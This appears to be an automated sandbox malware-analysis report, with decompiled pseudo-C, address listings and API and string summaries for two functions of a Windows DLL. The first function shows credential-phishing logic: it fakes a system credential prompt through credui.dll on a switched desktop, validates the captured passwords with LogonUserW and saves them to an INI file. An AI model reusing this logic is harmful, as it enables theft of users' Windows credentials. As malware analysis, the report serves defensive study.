				void* _t156;
				WCHAR* _t157;
				intOrPtr _t158;
				struct HDESK__* _t159;
				struct HDESK__* _t172;
				intOrPtr _t175;
				WCHAR* _t181;
				struct HDESK__* _t184;
				WCHAR* _t186;
				struct HINSTANCE__* _t189;
				short* _t191;
				void* _t192;
				signed int _t196;
				signed int _t197;
				WCHAR* _t200;
				long _t201;
				short* _t203;
				void* _t205;
				void* _t206;
				void* _t207;

				_t93 =  *0x7098f5b4; // 0xa599f8
				_t158 =  *0x7098f5a8; // 0xa521e0
				_t94 = E709854A0(_t158, _t93, 0x7098c560);
				_t205 =  &_v1676 + 0xc;
				if(_t94 != 0) {
					L39:
					return 0;
				} else {
					_t153 = 0;
					if(_a4 != 0) {
						_t184 =  *0x7098f530; // 0x0
						SwitchDesktop(_t184);
						_t150 =  *0x7098f530; // 0x0
						SetThreadDesktop(_t150);
					}
					_t189 = LoadLibraryW(L"credui.dll");
					_v1640 = _t189;
					if(_t189 == _t153) {
						L37:
						if(_a4 != _t153) {
							Sleep(0x7d0);
							_t159 =  *0x7098f534; // 0x0
							SwitchDesktop(_t159);
							_t172 =  *0x7098f534; // 0x0
							SetThreadDesktop(_t172);
						}
						goto L39;
					}
					_push(0xff000000);
					_push(4);
					_push( &_v1616);
					_push(_t189);
					_v1616 = 0x24bec39d;
					_v1612 = _t153;
					_v1608 = _t153;
					_v1604 = _t153;
					_v1600 = 0xb4bb2c26;
					_v1596 = _t153;
					_v1592 = _t153;
					_v1588 = _t153;
					_v1584 = 0x4b177521;
					_v1580 = _t153;
					_v1576 = _t153;
					_v1572 = _t153;
					_v1568 = 0xc07eb83e;
					_v1564 = _t153;
					_v1560 = _t153;
					_v1556 = _t153;
					_t99 = E70981E40();
					_t206 = _t205 + 0x10;
					if(_t99 == 0) {
						L36:
						FreeLibrary(_t189);
						goto L37;
					}
					_t186 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
					if(_t186 == _t153) {
						L35:
						goto L36;
					}
					_push(0x14);
					_push( &_v1636);
					L7098BF02();
					_v1644 = 0x14;
					_v1640 = _t153;
					_v1672 = 0x202;
					_v1656 = 0x101;
					_t26 =  &(_t186[0x657]); // 0xcae
					_t191 = _t26;
					_t27 =  &(_t186[0x6d8]); // 0xdb0
					_t200 = _t27;
					GetSystemDirectoryW( &_v1560, 0x104);
					PathAddBackslashW( &_v1560);
					_t106 = L"rstrui.exe";
					if(_v4 != _t153) {
						_t106 = L"wuaueng.dll";
					}
					lstrcatW( &_v1560, _t106);
					_t155 = LoadLibraryExW( &_v1560, _t153, 0x20);
					if(_t155 == 0) {
						L20:
						_t175 =  *0x7098f5a8; // 0xa521e0
						_t110 =  *0x7098f5b4; // 0xa599f8
						_t201 = 0;
						_t192 = 0;
						_v1652 = 0;
						_v1684 = 0;
						_v1676 = 0;
						_v1664 = 0;
						_v1680 = 0;
						wsprintfW( &_v1036, L"%s\\%s", _t110, _t175);
						_t207 = _t206 + 0x10;
						_push( &_v1672);
						_push(0);
						_push(0x7098c560);
						_push( &_v1028);
						_push(0);
						if(_v1556() != 0 || GetLastError() != 0x7a) {
							L34:
							HeapFree(GetProcessHeap(), _t201, _t186);
							_t189 = _v1660;
							_t153 = 0;
							goto L35;
						} else {
							_t156 = HeapAlloc(GetProcessHeap(), 8, _v1692);
							_v1680 = _t156;
							if(_t156 == 0) {
								goto L34;
							}
							_push( &_v1692);
							_push(_t156);
							_push(0x7098c560);
							_push( &_v1048);
							_push(0);
							if(_v1576() == 0) {
								L33:
								HeapFree(GetProcessHeap(), _t201, _t156);
								goto L34;
							}
							while(1) {
								L25:
								_push(0x20);
								_push( &_v1696);
								_push( &_v1708);
								_push( &_v1716);
								_push(_v1712);
								_push(_t156);
								_push( &_v1684);
								_push(_t192);
								_push( &_v1676);
								_v1692 = 1;
								_v1684 = _t201;
								_v1716 = _t201;
								_v1708 = _t201;
								_v1696 = _t201;
								if(_v1644() != 0) {
									break;
								}
								_push(0x404);
								_push(_t186);
								_v1740 = 0x202;
								L7098BF02();
								_push(0x202);
								_t74 =  &(_t186[0x202]); // 0x404
								_t157 = _t74;
								_push(_t157);
								_v1732 = 0x101;
								L7098BF02();
								_push( &_v1740);
								_push(_t157);
								_push(_t201);
								_push(_t201);
								_push( &_v1756);
								_push(_t186);
								_push(_v1760);
								_push(_v1768);
								_push(1);
								if(_v1680() != 0) {
									_push(0x404);
									_t81 =  &(_t186[0x303]); // 0x606
									_t203 = _t81;
									_push(_t203);
									L7098BF02();
									_push(0x2a4);
									_t82 =  &(_t186[0x505]); // 0xa0a
									L7098BF02();
									_push(0x152);
									_t83 =  &(_t186[0x505]); // 0xa0a
									_push(0x202);
									_push(_t203);
									_push(_t186);
									if(_v1716() == 0) {
										_t85 =  &(_t186[0x505]); // 0xa0a
										_t133 = E709854A0(_t203, _t85, _t157);
										_t207 = _t207 + 0xc;
										if(_t133 == 0) {
											_v1816 = 0;
											_t192 = 0x52e;
										} else {
											_t181 =  *0x7098f580; // 0xa65be8
											WritePrivateProfileStringW(StrChrW(0x7098cddc, 0x50), _t186, _t157, _t181);
										}
									}
									_t201 = 0;
								}
								__imp__CoTaskMemFree(_v1804);
								_t156 = _v1792;
								if(_v1784 == _t201) {
									continue;
								} else {
									goto L33;
								}
							}
							asm("sbb esi, esi");
							_t192 = ( ~_v72 & 0xfffff693) + 0xfdb;
							Sleep(0x1f4);
							goto L25;
						}
					} else {
						_push(0x80);
						_push(_t191);
						if(_v4 != 0) {
							if(LoadStringW(_t155, 0x69, ??, ??) > 0) {
								_v1632 = _t191;
							}
							_t196 = FormatMessageW(0xaff, _t155, 0xb0000028, 0, _t200, 0x926, 0);
							_t197 = _t196 + LoadStringW(_t155, 0x184,  &(_t200[_t196]), 0x926 - _t196);
							_t141 = wsprintfW( &(_t200[_t197]), L"\r\n\r\n");
							_t206 = _t206 + 8;
							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t200[_t197 + _t141]), 0x926 - _t197 + _t141, 0);
							L18:
							_v1628 = _t200;
							L19:
							FreeLibrary(_t155);
							goto L20;
						}
						_t146 = LoadStringW(_t155, 0xab, ??, ??);
						if(_t146 > 0) {
							_t34 = _t146 * 2; // 0xcb2
							_t191[_t146] = 0x20002e;
							if(LoadStringW(_t155, 0x91, _t191 + _t34 + 4, 0x80 - _t146) > 0) {
								_v1632 = _t191;
							}
						}
						if(LoadStringW(_t155, 0xd2, _t200, 0x926) <= 0) {
							goto L19;
						} else {
							goto L18;
						}
					}
				}
			}


















































































                                                                                                        0x70989b10
                                                                                                        0x70989b15
                                                                                                        0x70989b28
                                                                                                        0x70989b2d
                                                                                                        0x70989b32
                                                                                                        0x70989fe4
                                                                                                        0x70989fec
                                                                                                        0x70989b38
                                                                                                        0x70989b39
                                                                                                        0x70989b43
                                                                                                        0x70989b45
                                                                                                        0x70989b4c
                                                                                                        0x70989b52
                                                                                                        0x70989b58
                                                                                                        0x70989b58
                                                                                                        0x70989b69
                                                                                                        0x70989b6b
                                                                                                        0x70989b71
                                                                                                        0x70989fb4
                                                                                                        0x70989fbd
                                                                                                        0x70989fc4
                                                                                                        0x70989fca
                                                                                                        0x70989fd1
                                                                                                        0x70989fd7
                                                                                                        0x70989fde
                                                                                                        0x70989fde
                                                                                                        0x00000000
                                                                                                        0x70989fbd
                                                                                                        0x70989b77
                                                                                                        0x70989b7c
                                                                                                        0x70989b82
                                                                                                        0x70989b83
                                                                                                        0x70989b84
                                                                                                        0x70989b8c
                                                                                                        0x70989b90
                                                                                                        0x70989b94
                                                                                                        0x70989b98
                                                                                                        0x70989ba0
                                                                                                        0x70989ba4
                                                                                                        0x70989ba8
                                                                                                        0x70989bac
                                                                                                        0x70989bb4
                                                                                                        0x70989bb8
                                                                                                        0x70989bbc
                                                                                                        0x70989bc3
                                                                                                        0x70989bce
                                                                                                        0x70989bd5
                                                                                                        0x70989bdc
                                                                                                        0x70989be3
                                                                                                        0x70989be8
                                                                                                        0x70989bed
                                                                                                        0x70989fad
                                                                                                        0x70989fae
                                                                                                        0x00000000
                                                                                                        0x70989fae
                                                                                                        0x70989c08
                                                                                                        0x70989c0c
                                                                                                        0x70989fac
                                                                                                        0x00000000
                                                                                                        0x70989fac
                                                                                                        0x70989c13
                                                                                                        0x70989c19
                                                                                                        0x70989c1a
                                                                                                        0x70989c2c
                                                                                                        0x70989c34
                                                                                                        0x70989c38
                                                                                                        0x70989c40
                                                                                                        0x70989c48
                                                                                                        0x70989c48
                                                                                                        0x70989c4e
                                                                                                        0x70989c4e
                                                                                                        0x70989c54
                                                                                                        0x70989c62
                                                                                                        0x70989c68
                                                                                                        0x70989c74
                                                                                                        0x70989c76
                                                                                                        0x70989c76
                                                                                                        0x70989c84
                                                                                                        0x70989c9b
                                                                                                        0x70989c9f
                                                                                                        0x70989d98
                                                                                                        0x70989d98
                                                                                                        0x70989d9e
                                                                                                        0x70989da5
                                                                                                        0x70989db4
                                                                                                        0x70989db6
                                                                                                        0x70989dba
                                                                                                        0x70989dbe
                                                                                                        0x70989dc2
                                                                                                        0x70989dc6
                                                                                                        0x70989dca
                                                                                                        0x70989dd0
                                                                                                        0x70989dd7
                                                                                                        0x70989dd8
                                                                                                        0x70989dd9
                                                                                                        0x70989de5
                                                                                                        0x70989de6
                                                                                                        0x70989df0
                                                                                                        0x70989f96
                                                                                                        0x70989f9f
                                                                                                        0x70989fa5
                                                                                                        0x70989fa9
                                                                                                        0x00000000
                                                                                                        0x70989e05
                                                                                                        0x70989e19
                                                                                                        0x70989e1b
                                                                                                        0x70989e21
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989e2b
                                                                                                        0x70989e2c
                                                                                                        0x70989e2d
                                                                                                        0x70989e39
                                                                                                        0x70989e3a
                                                                                                        0x70989e44
                                                                                                        0x70989f87
                                                                                                        0x70989f90
                                                                                                        0x00000000
                                                                                                        0x70989f90
                                                                                                        0x70989e50
                                                                                                        0x70989e50
                                                                                                        0x70989e50
                                                                                                        0x70989e56
                                                                                                        0x70989e5f
                                                                                                        0x70989e64
                                                                                                        0x70989e65
                                                                                                        0x70989e66
                                                                                                        0x70989e6b
                                                                                                        0x70989e6c
                                                                                                        0x70989e71
                                                                                                        0x70989e72
                                                                                                        0x70989e7a
                                                                                                        0x70989e7e
                                                                                                        0x70989e82
                                                                                                        0x70989e86
                                                                                                        0x70989e90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989e96
                                                                                                        0x70989e9b
                                                                                                        0x70989e9c
                                                                                                        0x70989ea4
                                                                                                        0x70989ea9
                                                                                                        0x70989eae
                                                                                                        0x70989eae
                                                                                                        0x70989eb4
                                                                                                        0x70989eb5
                                                                                                        0x70989ebd
                                                                                                        0x70989eca
                                                                                                        0x70989ecf
                                                                                                        0x70989ed0
                                                                                                        0x70989ed1
                                                                                                        0x70989ed6
                                                                                                        0x70989ed7
                                                                                                        0x70989ed8
                                                                                                        0x70989ed9
                                                                                                        0x70989eda
                                                                                                        0x70989ee5
                                                                                                        0x70989eeb
                                                                                                        0x70989ef0
                                                                                                        0x70989ef0
                                                                                                        0x70989ef6
                                                                                                        0x70989ef7
                                                                                                        0x70989efc
                                                                                                        0x70989f01
                                                                                                        0x70989f08
                                                                                                        0x70989f0d
                                                                                                        0x70989f12
                                                                                                        0x70989f19
                                                                                                        0x70989f1e
                                                                                                        0x70989f1f
                                                                                                        0x70989f29
                                                                                                        0x70989f2c
                                                                                                        0x70989f34
                                                                                                        0x70989f39
                                                                                                        0x70989f3e
                                                                                                        0x70989f5f
                                                                                                        0x70989f67
                                                                                                        0x70989f40
                                                                                                        0x70989f40
                                                                                                        0x70989f57
                                                                                                        0x70989f57
                                                                                                        0x70989f3e
                                                                                                        0x70989f6c
                                                                                                        0x70989f6c
                                                                                                        0x70989f73
                                                                                                        0x70989f79
                                                                                                        0x70989f81
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989f81
                                                                                                        0x70989ff8
                                                                                                        0x7098a005
                                                                                                        0x7098a00b
                                                                                                        0x00000000
                                                                                                        0x7098a00b
                                                                                                        0x70989ca5
                                                                                                        0x70989cad
                                                                                                        0x70989cb2
                                                                                                        0x70989cb3
                                                                                                        0x70989d17
                                                                                                        0x70989d19
                                                                                                        0x70989d19
                                                                                                        0x70989d38
                                                                                                        0x70989d53
                                                                                                        0x70989d5f
                                                                                                        0x70989d65
                                                                                                        0x70989d87
                                                                                                        0x70989d8d
                                                                                                        0x70989d8d
                                                                                                        0x70989d91
                                                                                                        0x70989d92
                                                                                                        0x00000000
                                                                                                        0x70989d92
                                                                                                        0x70989cbb
                                                                                                        0x70989cc3
                                                                                                        0x70989ccd
                                                                                                        0x70989cd8
                                                                                                        0x70989ce7
                                                                                                        0x70989ce9
                                                                                                        0x70989ce9
                                                                                                        0x70989ce7
                                                                                                        0x70989d01
                                                                                                        0x00000000
                                                                                                        0x70989d07
                                                                                                        0x00000000
                                                                                                        0x70989d07
                                                                                                        0x70989d01
                                                                                                        0x70989c9f

                                                                                                        APIs
                                                                                                          • Part of subcall function 709854A0: LogonUserW.ADVAPI32(00A521E0,00A521E0,70989B2D,00000002,00000000,00A599F8), ref: 709854C0
                                                                                                          • Part of subcall function 709854A0: GetLastError.KERNEL32(?,?,00A521E0,70989B2D,00A521E0,00A599F8,7098C560), ref: 709854CC
                                                                                                          • Part of subcall function 709854A0: CloseHandle.KERNEL32(00A599F8,?,?,00A521E0,70989B2D,00A521E0,00A599F8,7098C560), ref: 709854E7
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 70989B4C
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 70989B58
                                                                                                        • LoadLibraryW.KERNEL32(credui.dll), ref: 70989B63
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,?,00000004,FF000000), ref: 70989BFB
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000004,FF000000), ref: 70989C02
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70989C1A
                                                                                                        • GetSystemDirectoryW.KERNEL32 ref: 70989C54
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 70989C62
                                                                                                        • lstrcatW.KERNEL32(?,rstrui.exe), ref: 70989C84
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000020), ref: 70989C95
                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 70989CBB
                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 70989CDF
                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 70989CF9
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000004,FF000000), ref: 70989D92
                                                                                                        • wsprintfW.USER32 ref: 70989DCA
                                                                                                        • GetLastError.KERNEL32(?,?,00000004,FF000000), ref: 70989DF6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,00000004,FF000000), ref: 70989E0C
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989E13
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 70989EA4
                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 70989EBD
                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 70989EF7
                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 70989F08
                                                                                                        • StrChrW.SHLWAPI(7098CDDC,00000050,00000000,00000404,00A65BE8,?,?,?,?,00000020,?,?,00000004,FF000000), ref: 70989F50
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,?,00000004), ref: 70989F57
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 70989F73
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,FF000000), ref: 70989F89
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989F90
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,FF000000), ref: 70989F98
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989F9F
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004,FF000000), ref: 70989FAE
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 70989FC4
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 70989FD1
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 70989FDE
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A00B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                        • String ID: $%s\%s$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                        • API String ID: 938628543-3234645550
                                                                                                        • Opcode ID: bf902292e04c7d715edaf1194abb34548828e666f397e949e3d80463f9a497c9
                                                                                                        • Instruction ID: bfbd0b9fe30532019df8bd5ccbec025c517c87d3f704dcf980ad18b1bfdb7147
                                                                                                        • Opcode Fuzzy Hash: bf902292e04c7d715edaf1194abb34548828e666f397e949e3d80463f9a497c9
                                                                                                        • Instruction Fuzzy Hash: 81D120B2618304AFE3109F65CC89F5FBBACFB88704F50492DF696963D1D774A8048B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709847A0, Relevance: 46.8, APIs: 31, Instructions: 257memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 66%
                                                                                                        			E709847A0(void* __ebx, void* __edi) {
				WCHAR* _t39;
				int _t40;
				WCHAR* _t44;
				intOrPtr _t48;
				void* _t51;
				WCHAR* _t60;
				void* _t65;
				WCHAR* _t70;
				WCHAR* _t72;
				WCHAR* _t79;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				WCHAR* _t88;
				signed int _t89;
				WCHAR* _t99;
				WCHAR* _t100;
				WCHAR* _t101;
				WCHAR* _t104;
				intOrPtr _t105;
				WCHAR* _t110;
				WCHAR* _t111;
				void* _t113;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				WCHAR* _t122;
				WCHAR* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				void* _t129;

				_t113 = __edi;
				_t85 = __ebx;
				 *(_t125 + 0xc) = 0;
				if( *0x7098f5f4 == 0) {
					L23:
					return  *(_t125 + 0xc);
				} else {
					_t39 =  *0x7098f57c; // 0xa65be8
					_t88 =  *0x7098f588; // 0x79a25c
					_t104 =  *0x7098f58c; // 0x7837d8
					_t40 = GetPrivateProfileIntW(_t104, _t88, 0, _t39);
					_t116 =  *((intOrPtr*)(_t125 + 0x38));
					if(_t116 != 0 || _t40 != 0) {
						if( *((intOrPtr*)(_t125 + 0x3c)) != 0) {
							goto L7;
						} else {
							_t83 =  *0x7098f588; // 0x79a25c
							_t84 = E709839F0(_t83, 0, 0, 1);
							_t125 = _t125 + 0x10;
							if(_t84 == (0 | _t116 == 0x00000000)) {
								goto L7;
							}
						}
						goto L23;
					} else {
						if( *((intOrPtr*)(_t125 + 0x3c)) != _t40) {
							L7:
							_push(_t113);
							_t114 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
							if(_t114 != 0) {
								_push(_t85);
								_push(StrChrW(0x7098ca24, 0x2e));
								_t44 = StrChrW(0x7098ca18, 0x76);
								_t105 =  *0x7098f5cc; // 0xa4b6c8
								_push(_t44);
								_push(_t105);
								wsprintfW(_t114, StrChrW(0x7098ca08, 0x25));
								_t126 = _t125 + 0x14;
								_push(0x5c);
								_t7 = _t114 + 0x402; // 0x402
								_t122 = _t7;
								_push(StrChrW(0x7098ca18, 0x76));
								_t48 =  *0x7098f5cc; // 0xa4b6c8
								_push(_t48);
								 *((intOrPtr*)(_t126 + 0x3c)) = wsprintfW(_t122, StrChrW(0x7098c9f4, 0x25));
								_t51 = E70982EC0(_t114, _t122, 0);
								_t125 = _t126 + 0x20;
								if(_t51 != 0) {
									_t89 =  *0x7098f59c; // 0x1
									asm("sbb ecx, ecx");
									_push(0x5c);
									_push(( ~_t89 & 0xffffffea) + 0x56);
									_push(_t122);
									wsprintfW(_t114, StrChrW(0x7098c9e4, 0x25));
									_t9 = _t114 + 0xc04; // 0xc04
									_t124 = _t9;
									_push(StrChrW(0x7098c9d8, 0x2e));
									_push(StrChrW(0x7098c9c4, 0x69));
									_push(_t114);
									_t11 = wsprintfW(_t124, StrChrW(0x7098ca08, 0x25)) * 2; // 0xc06
									_t60 =  *0x7098f588; // 0x79a25c
									_t128 = _t125 + 0x28;
									 *((intOrPtr*)(_t128 + 0x10)) = _t124 + _t11 + 2;
									_push(_t60);
									if( *((intOrPtr*)(_t128 + 0x44)) == 0) {
										_push(StrChrW(0x7098c988, 0x72));
										wsprintfW( *(_t128 + 0x18), StrChrW(0x7098c978, 0x25));
										_t129 = _t128 + 0x10;
									} else {
										_t79 = StrChrW(0x7098c9b8, 0x2e);
										_t101 =  *0x7098f588; // 0x79a25c
										_push(_t79);
										_push(_t101);
										_push(_t114);
										_push(StrChrW(0x7098c9c4, 0x69));
										wsprintfW( *(_t128 + 0x24), StrChrW(0x7098c998, 0x25));
										_t129 = _t128 + 0x1c;
									}
									_push(_t129 + 0x14);
									_push(0x1e);
									_push(0);
									 *(_t129 + 0x2c) = 0;
									_t65 = E709844E0(0, _t124,  *((intOrPtr*)(_t129 + 0x10)));
									_t125 = _t129 + 0x18;
									if(_t65 != 0) {
										if(E709845B0() != 0) {
											_t100 =  *0x7098f588; // 0x79a25c
											_push(_t100);
											_push(StrChrW(0x7098c964, 0x72));
											wsprintfW( *(_t125 + 0x18), StrChrW(0x7098c978, 0x25));
											_push(0);
											_push(0x1e);
											_push(0);
											E709844E0(0, _t124,  *(_t125 + 0x18));
											_t125 = _t125 + 0x28;
										}
										_t119 =  *((intOrPtr*)(_t125 + 0x44));
										if(_t119 == 0) {
											_t70 =  *0x7098f588; // 0x79a25c
											E70983850(_t70, 1);
											_t125 = _t125 + 8;
										} else {
											_t111 =  *0x7098f588; // 0x79a25c
											E709839F0(_t111, 0, 0, 0);
											_t125 = _t125 + 0x10;
										}
										if( *((intOrPtr*)(_t125 + 0x14)) == 0) {
											_t124[1] = 0;
											 *_t124 = (0 | _t119 != 0x00000000) + 0x30;
											_t72 =  *0x7098f57c; // 0xa65be8
											_t99 =  *0x7098f588; // 0x79a25c
											_t110 =  *0x7098f58c; // 0x7837d8
											WritePrivateProfileStringW(_t110, _t99, _t124, _t72);
											 *(_t125 + 0x18) = 1;
										}
									}
									_t28 = _t114 + 0x402; // 0x402
									_t118 = _t28;
									 *((intOrPtr*)(_t118 +  *(_t125 + 0x1c) * 2 - 2)) = 0;
									_push(0x1e);
									_push(_t125 + 0x24);
									L7098BF02();
									 *((intOrPtr*)(_t125 + 0x28)) = 3;
									 *((intOrPtr*)(_t125 + 0x2c)) = _t118;
									 *((short*)(_t125 + 0x34)) = 0x614;
									SHFileOperationW(_t125 + 0x20);
								}
								HeapFree(GetProcessHeap(), 0, _t114);
							}
							goto L23;
						} else {
							return _t40;
						}
					}
				}
			}




































                                                                                                        0x709847a0
                                                                                                        0x709847a0
                                                                                                        0x709847ab
                                                                                                        0x709847b3
                                                                                                        0x70984a82
                                                                                                        0x70984a8a
                                                                                                        0x709847b9
                                                                                                        0x709847b9
                                                                                                        0x709847be
                                                                                                        0x709847c4
                                                                                                        0x709847cf
                                                                                                        0x709847d5
                                                                                                        0x709847db
                                                                                                        0x709847f1
                                                                                                        0x00000000
                                                                                                        0x709847f3
                                                                                                        0x709847f3
                                                                                                        0x709847ff
                                                                                                        0x70984806
                                                                                                        0x70984810
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984810
                                                                                                        0x00000000
                                                                                                        0x709847e1
                                                                                                        0x709847e5
                                                                                                        0x70984816
                                                                                                        0x70984816
                                                                                                        0x7098482b
                                                                                                        0x7098482f
                                                                                                        0x7098483b
                                                                                                        0x70984846
                                                                                                        0x7098484e
                                                                                                        0x70984850
                                                                                                        0x70984856
                                                                                                        0x70984857
                                                                                                        0x70984869
                                                                                                        0x7098486b
                                                                                                        0x7098486e
                                                                                                        0x70984877
                                                                                                        0x70984877
                                                                                                        0x7098487f
                                                                                                        0x70984880
                                                                                                        0x70984885
                                                                                                        0x70984897
                                                                                                        0x7098489b
                                                                                                        0x709848a0
                                                                                                        0x709848a5
                                                                                                        0x709848ab
                                                                                                        0x709848b3
                                                                                                        0x709848b5
                                                                                                        0x709848bd
                                                                                                        0x709848be
                                                                                                        0x709848ca
                                                                                                        0x709848d6
                                                                                                        0x709848d6
                                                                                                        0x709848de
                                                                                                        0x709848e8
                                                                                                        0x709848e9
                                                                                                        0x709848f7
                                                                                                        0x709848fb
                                                                                                        0x70984900
                                                                                                        0x70984908
                                                                                                        0x7098490c
                                                                                                        0x7098490d
                                                                                                        0x7098494a
                                                                                                        0x7098495a
                                                                                                        0x7098495c
                                                                                                        0x7098490f
                                                                                                        0x70984916
                                                                                                        0x70984918
                                                                                                        0x7098491e
                                                                                                        0x7098491f
                                                                                                        0x70984920
                                                                                                        0x7098492a
                                                                                                        0x7098493a
                                                                                                        0x7098493c
                                                                                                        0x7098493c
                                                                                                        0x70984967
                                                                                                        0x70984968
                                                                                                        0x7098496a
                                                                                                        0x70984970
                                                                                                        0x70984978
                                                                                                        0x7098497d
                                                                                                        0x70984982
                                                                                                        0x7098498f
                                                                                                        0x70984991
                                                                                                        0x70984997
                                                                                                        0x709849a1
                                                                                                        0x709849b1
                                                                                                        0x709849b3
                                                                                                        0x709849b5
                                                                                                        0x709849b7
                                                                                                        0x709849bd
                                                                                                        0x709849c2
                                                                                                        0x709849c2
                                                                                                        0x709849c5
                                                                                                        0x709849cb
                                                                                                        0x709849e4
                                                                                                        0x709849ec
                                                                                                        0x709849f1
                                                                                                        0x709849cd
                                                                                                        0x709849cd
                                                                                                        0x709849da
                                                                                                        0x709849df
                                                                                                        0x709849df
                                                                                                        0x709849f9
                                                                                                        0x70984a04
                                                                                                        0x70984a0b
                                                                                                        0x70984a0f
                                                                                                        0x70984a14
                                                                                                        0x70984a1a
                                                                                                        0x70984a24
                                                                                                        0x70984a2a
                                                                                                        0x70984a2a
                                                                                                        0x709849f9
                                                                                                        0x70984a38
                                                                                                        0x70984a38
                                                                                                        0x70984a3e
                                                                                                        0x70984a42
                                                                                                        0x70984a48
                                                                                                        0x70984a49
                                                                                                        0x70984a58
                                                                                                        0x70984a60
                                                                                                        0x70984a64
                                                                                                        0x70984a69
                                                                                                        0x70984a69
                                                                                                        0x70984a79
                                                                                                        0x70984a80
                                                                                                        0x00000000
                                                                                                        0x709847eb
                                                                                                        0x709847eb
                                                                                                        0x709847eb
                                                                                                        0x709847e5
                                                                                                        0x709847db

                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 709847CF
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,750D2940), ref: 7098481E
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70984825
                                                                                                        • StrChrW.SHLWAPI(7098CA24,0000002E,00000000,?), ref: 70984844
                                                                                                        • StrChrW.SHLWAPI(7098CA18,00000076,00000000), ref: 7098484E
                                                                                                        • StrChrW.SHLWAPI(7098CA08,00000025,00A4B6C8,00000000), ref: 7098485F
                                                                                                        • wsprintfW.USER32 ref: 70984869
                                                                                                        • StrChrW.SHLWAPI(7098CA18,00000076,0000005C), ref: 7098487D
                                                                                                        • StrChrW.SHLWAPI(7098C9F4,00000025,00A4B6C8,00000000), ref: 7098488D
                                                                                                        • wsprintfW.USER32 ref: 70984891
                                                                                                        • StrChrW.SHLWAPI(7098C9E4,00000025,00000402,-00000055,0000005C), ref: 709848C6
                                                                                                        • wsprintfW.USER32 ref: 709848CA
                                                                                                        • StrChrW.SHLWAPI(7098C9D8,0000002E), ref: 709848DC
                                                                                                        • StrChrW.SHLWAPI(7098C9C4,00000069,00000000), ref: 709848E6
                                                                                                        • StrChrW.SHLWAPI(7098CA08,00000025,00000000,00000000), ref: 709848F1
                                                                                                        • wsprintfW.USER32 ref: 709848F5
                                                                                                        • StrChrW.SHLWAPI(7098C9B8,0000002E,0079A25C), ref: 70984916
                                                                                                        • StrChrW.SHLWAPI(7098C9C4,00000069,00000000,0079A25C,00000000), ref: 70984928
                                                                                                        • StrChrW.SHLWAPI(7098C998,00000025,00000000), ref: 70984932
                                                                                                        • wsprintfW.USER32 ref: 7098493A
                                                                                                        • StrChrW.SHLWAPI(7098C988,00000072,0079A25C), ref: 70984948
                                                                                                        • StrChrW.SHLWAPI(7098C978,00000025,00000000), ref: 70984952
                                                                                                        • wsprintfW.USER32 ref: 7098495A
                                                                                                        • StrChrW.SHLWAPI(7098C964,00000072,0079A25C,?,00000C04,?,00000000,0000001E,?), ref: 7098499F
                                                                                                        • StrChrW.SHLWAPI(7098C978,00000025,00000000,?,00000C04,?,00000000,0000001E,?), ref: 709849A9
